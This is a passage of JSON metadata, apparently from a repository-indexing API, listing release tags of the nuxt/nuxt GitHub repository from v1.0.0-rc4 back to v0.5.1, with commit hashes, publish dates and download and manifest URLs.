0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url